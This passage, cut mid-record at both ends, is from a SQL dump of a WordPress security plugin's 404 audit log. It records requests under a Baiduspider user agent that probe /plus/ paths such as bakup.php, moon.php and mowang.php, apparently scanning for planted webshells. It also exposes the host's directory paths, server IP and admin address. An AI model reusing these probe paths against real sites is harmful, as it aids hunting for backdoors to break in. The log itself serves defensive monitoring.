14:27:15',35053288,36861648,'https://bintara.com.my/plus/e7xue.php',1,0,'178.43.61.49'),(27713,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/plus/digg.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"47.61.116.114\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=4de4511735ba5a74a1701b24a2674693\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"47.61.116.114\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/digg.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/plus/digg.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycu7DTiPzaBc@31OEz8QAAARA\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/digg.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/plus/digg.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycu7DTiPzaBc@31OEz8QAAARA\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/digg.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/plus/digg.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZycu7DTiPzaBc@31OEz8QAAARA\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"49274\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/digg.php\";s:10:\"SCRIPT_URL\";s:14:\"/plus/digg.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZycu7DTiPzaBc@31OEz8QAAARA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544827.7348\";s:12:\"REQUEST_TIME\";s:10:\"1570544827\";}}','notice','2019-10-08 14:27:09','2019-10-08 14:27:08',35053128,36854000,'https://bintara.com.my/plus/digg.php',1,0,'47.61.116.114'),(27712,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/plus/bakup.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"252.224.37.56\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=bcb987901fd0b5af79b48db2b8272c9b\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"252.224.37.56\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/bakup.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/bakup.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycs1Q75tQHORtJE8pnQQAAAEI\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/bakup.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/bakup.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycs1Q75tQHORtJE8pnQQAAAEI\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/bakup.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/bakup.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZycs1Q75tQHORtJE8pnQQAAAEI\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"64718\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/bakup.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/bakup.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZycs1Q75tQHORtJE8pnQQAAAEI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544819.3756\";s:12:\"REQUEST_TIME\";s:10:\"1570544819\";}}','notice','2019-10-08 14:27:01','2019-10-08 14:26:59',35052792,36845168,'https://bintara.com.my/plus/bakup.php',1,0,'119.187.228.206'),(27728,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/plus/mytag_js.php?aid=511348\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"247.216.232.139\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=a0d5251ef051e198956ed507b2a2870d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"247.216.232.139\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydZLDTiPzaBc@31OE0XgAAAQ4\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydZLDTiPzaBc@31OE0XgAAAQ4\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZydZLDTiPzaBc@31OE0XgAAAQ4\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"51097\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:10:\"SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZydZLDTiPzaBc@31OE0XgAAAQ4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544996.6376\";s:12:\"REQUEST_TIME\";s:10:\"1570544996\";}}','notice','2019-10-08 14:29:58','2019-10-08 14:29:57',35056480,36857288,'https://bintara.com.my/plus/mytag_js.php?aid=511348',1,0,'119.187.228.206'),(27718,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/plus/md5.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"194.207.121.133\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c20766dc7c4245bc25233fed63a3a22f\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"194.207.121.133\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/plus/md5.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/plus/md5.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyc7rDTiPzaBc@31OE0EwAAAQA\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/plus/md5.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/plus/md5.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyc7rDTiPzaBc@31OE0EwAAAQA\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/plus/md5.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/plus/md5.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZyc7rDTiPzaBc@31OE0EwAAAQA\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"55535\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/plus/md5.php\";s:10:\"SCRIPT_URL\";s:13:\"/plus/md5.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZyc7rDTiPzaBc@31OE0EwAAAQA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544879.0722\";s:12:\"REQUEST_TIME\";s:10:\"1570544879\";}}','notice','2019-10-08 14:28:00','2019-10-08 14:27:59',35054272,36862576,'https://bintara.com.my/plus/md5.php',1,0,'194.207.121.133'),(27717,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/plus/mcds.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"108.145.55.141\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=55a0f94c93cc5a254e099ea600b6321e\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"108.145.55.141\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/mcds.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/plus/mcds.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyc5nURUVLSjYCXpcIzLAAAANc\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/mcds.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/plus/mcds.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyc5nURUVLSjYCXpcIzLAAAANc\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/mcds.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/plus/mcds.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZyc5nURUVLSjYCXpcIzLAAAANc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"53493\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/mcds.php\";s:10:\"SCRIPT_URL\";s:14:\"/plus/mcds.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZyc5nURUVLSjYCXpcIzLAAAANc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544870.7703\";s:12:\"REQUEST_TIME\";s:10:\"1570544870\";}}','notice','2019-10-08 14:27:53','2019-10-08 14:27:51',35446608,37243208,'https://bintara.com.my/plus/mcds.php',1,0,'108.145.55.141'),(27719,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/plus/moon.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"79.240.217.100\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=947fc9095f326f586e2fef1724a014e0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"79.240.217.100\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/moon.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/plus/moon.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyc9lQ75tQHORtJE8pnRgAAAFQ\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/moon.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/plus/moon.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyc9lQ75tQHORtJE8pnRgAAAFQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/moon.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/plus/moon.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZyc9lQ75tQHORtJE8pnRgAAAFQ\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"57398\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/moon.php\";s:10:\"SCRIPT_URL\";s:14:\"/plus/moon.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZyc9lQ75tQHORtJE8pnRgAAAFQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544886.3568\";s:12:\"REQUEST_TIME\";s:10:\"1570544886\";}}','notice','2019-10-08 14:28:08','2019-10-08 14:28:06',35051888,36850784,'https://bintara.com.my/plus/moon.php',1,0,'79.240.217.100'),(27720,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/plus/mowang.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"66.58.168.232\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=ca32a87fef3cdaa72ef